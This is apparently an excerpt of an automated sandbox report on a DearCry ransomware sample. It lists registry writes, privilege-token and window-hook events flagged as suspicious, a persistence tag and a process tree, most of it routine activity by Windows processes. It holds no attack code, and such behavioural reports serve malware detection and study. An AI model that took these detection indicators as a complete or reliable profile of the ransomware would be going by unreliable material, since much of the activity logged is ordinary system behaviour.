Set value (int)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "129"	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	C:\Windows\explorer.exe	N/A
Set value (str)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Set value (int)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\NumberOfSubdomains = "2"	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings	C:\Windows\explorer.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings	C:\Windows\explorer.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings	C:\Windows\explorer.exe	N/A
Set value (data)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	C:\Windows\explorer.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1750093773-264148664-1320403265-1000\{54BC93C3-1377-4A14-9BE0-4F794E59B614}	C:\Windows\explorer.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	C:\Windows\explorer.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	C:\Windows\explorer.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	C:\Windows\explorer.exe	N/A
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1750093773-264148664-1320403265-1000\{12DBA035-02B1-4671-BC85-F1C1A4063E0D}	C:\Windows\explorer.exe	N/A
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	C:\Windows\explorer.exe	N/A
Set value (int)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "0"	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Set value (int)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56"	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\MuiCache	C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe	N/A
Set value (str)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN"	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Set value (int)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1750093773-264148664-1320403265-1000\{E1D6C444-D0A4-45AD-B71A-68C133EACD9F}	C:\Windows\explorer.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	C:\Windows\explorer.exe	N/A
Set value (data)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	C:\Windows\explorer.exe	N/A
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	C:\Windows\explorer.exe	N/A
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\	C:\Windows\explorer.exe	N/A
Set value (str)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Set value (int)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "0"	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Set value (data)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	C:\Windows\explorer.exe	N/A
Set value (int)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56"	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	C:\Windows\explorer.exe	N/A
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	C:\Windows\explorer.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Set value (int)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23"	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Set value (data)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	C:\Windows\explorer.exe	N/A
Set value (data)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000	C:\Windows\explorer.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Set value (int)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23"	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	C:\Windows\explorer.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	C:\Windows\explorer.exe	N/A
Set value (data)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	C:\Windows\explorer.exe	N/A
Set value (str)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Set value (int)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Set value (data)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	C:\Windows\explorer.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\explorer.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\explorer.exe	N/A

Suspicious use of FindShellTrayWindow

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A

Suspicious use of SendNotifyMessage

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A
N/A	N/A	C:\Windows\explorer.exe	N/A

Suspicious use of SetWindowsHookEx

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe	N/A
N/A	N/A	C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe	N/A
N/A	N/A	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

